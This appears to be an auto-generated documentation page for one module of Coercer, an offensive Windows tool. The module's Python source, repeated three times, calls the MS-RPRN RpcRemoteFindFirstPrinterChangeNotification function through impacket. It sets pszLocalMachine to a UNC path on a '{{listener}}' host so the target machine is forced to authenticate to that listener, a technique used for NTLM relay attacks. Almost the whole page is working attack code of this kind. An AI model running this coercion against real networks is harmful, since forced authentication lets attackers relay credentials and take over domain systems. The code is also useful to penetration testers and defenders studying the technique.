coercer.methods.MS_RPRN.RpcRemoteFindFirstPrinterChangeNotification
1#!/usr/bin/env python3 2# -*- coding: utf-8 -*- 3# File name : RpcRemoteFindFirstPrinterChangeNotification.py 4# Author : Podalirius (@podalirius_) 5# Date created : 15 Sep 2022 6 7from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL 8from coercer.network.DCERPCSessionError import DCERPCSessionError 9from impacket.dcerpc.v5 import rprn 10from impacket.dcerpc.v5.dtypes import NULL 11 12 13class RpcRemoteFindFirstPrinterChangeNotification(MSPROTOCOLRPCCALL): 14 """ 15 Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotification (opnum 62) of [MS-RPRN]: Print System Remote Protocol (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b8b414d9-f1cd-4191-bb6b-87d09ab2fd83) 16 17 Method found by: 18 - 19 """ 20 21 exploit_paths = [ 22 ("smb", '\\\\{{listener}}\x00') 23 ] 24 25 access = { 26 "ncan_np": [ 27 { 28 "namedpipe": r"\PIPE\spoolss", 29 "uuid": "12345678-1234-abcd-ef00-0123456789ab", 30 "version": "1.0" 31 } 32 ], 33 "ncacn_ip_tcp": [ 34 { 35 "uuid": "12345678-1234-ABCD-EF00-0123456789AB", 36 "version": "1.0" 37 } 38 ] 39 } 40 41 protocol = { 42 "longname": "[MS-RPRN]: Print System Remote Protocol", 43 "shortname": "MS-RPRN" 44 } 45 46 function = { 47 "name": "RpcRemoteFindFirstPrinterChangeNotification", 48 "opnum": 62, 49 "vulnerable_arguments": ["pszLocalMachine"] 50 } 51 52 def trigger(self, dcerpc_session, target): 53 if dcerpc_session is not None: 54 try: 55 resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target) 56 request = rprn.RpcRemoteFindFirstPrinterChangeNotification() 57 request['hPrinter'] = resp['pHandle'] 58 request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB 59 # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/41d5c622-ec77-49ff-95e3-69b325ce4e77 60 request['fdwOptions'] = 0x00000000 61 request['pszLocalMachine'] = self.path 62 request['dwPrinterLocal'] = 0 63 request['cbBuffer'] = NULL 64 request['pBuffer'] = NULL 65 resp = dcerpc_session.request(request) 66 return "" 67 except Exception as err: 68 return err 69 else: 70 print("[!] Error: dce is None, you must call connect() first.") 71 return None
class
RpcRemoteFindFirstPrinterChangeNotification(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
14class RpcRemoteFindFirstPrinterChangeNotification(MSPROTOCOLRPCCALL): 15 """ 16 Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotification (opnum 62) of [MS-RPRN]: Print System Remote Protocol (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b8b414d9-f1cd-4191-bb6b-87d09ab2fd83) 17 18 Method found by: 19 - 20 """ 21 22 exploit_paths = [ 23 ("smb", '\\\\{{listener}}\x00') 24 ] 25 26 access = { 27 "ncan_np": [ 28 { 29 "namedpipe": r"\PIPE\spoolss", 30 "uuid": "12345678-1234-abcd-ef00-0123456789ab", 31 "version": "1.0" 32 } 33 ], 34 "ncacn_ip_tcp": [ 35 { 36 "uuid": "12345678-1234-ABCD-EF00-0123456789AB", 37 "version": "1.0" 38 } 39 ] 40 } 41 42 protocol = { 43 "longname": "[MS-RPRN]: Print System Remote Protocol", 44 "shortname": "MS-RPRN" 45 } 46 47 function = { 48 "name": "RpcRemoteFindFirstPrinterChangeNotification", 49 "opnum": 62, 50 "vulnerable_arguments": ["pszLocalMachine"] 51 } 52 53 def trigger(self, dcerpc_session, target): 54 if dcerpc_session is not None: 55 try: 56 resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target) 57 request = rprn.RpcRemoteFindFirstPrinterChangeNotification() 58 request['hPrinter'] = resp['pHandle'] 59 request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB 60 # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/41d5c622-ec77-49ff-95e3-69b325ce4e77 61 request['fdwOptions'] = 0x00000000 62 request['pszLocalMachine'] = self.path 63 request['dwPrinterLocal'] = 0 64 request['cbBuffer'] = NULL 65 request['pBuffer'] = NULL 66 resp = dcerpc_session.request(request) 67 return "" 68 except Exception as err: 69 return err 70 else: 71 print("[!] Error: dce is None, you must call connect() first.") 72 return None
Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotification (opnum 62) of [MS-RPRN]: Print System Remote Protocol (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b8b414d9-f1cd-4191-bb6b-87d09ab2fd83)
Method found by: -
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\spoolss', 'uuid': '12345678-1234-abcd-ef00-0123456789ab', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': '12345678-1234-ABCD-EF00-0123456789AB', 'version': '1.0'}]}
function =
{'name': 'RpcRemoteFindFirstPrinterChangeNotification', 'opnum': 62, 'vulnerable_arguments': ['pszLocalMachine']}
def
trigger(self, dcerpc_session, target):
53 def trigger(self, dcerpc_session, target): 54 if dcerpc_session is not None: 55 try: 56 resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target) 57 request = rprn.RpcRemoteFindFirstPrinterChangeNotification() 58 request['hPrinter'] = resp['pHandle'] 59 request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB 60 # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/41d5c622-ec77-49ff-95e3-69b325ce4e77 61 request['fdwOptions'] = 0x00000000 62 request['pszLocalMachine'] = self.path 63 request['dwPrinterLocal'] = 0 64 request['cbBuffer'] = NULL 65 request['pBuffer'] = NULL 66 resp = dcerpc_session.request(request) 67 return "" 68 except Exception as err: 69 return err 70 else: 71 print("[!] Error: dce is None, you must call connect() first.") 72 return None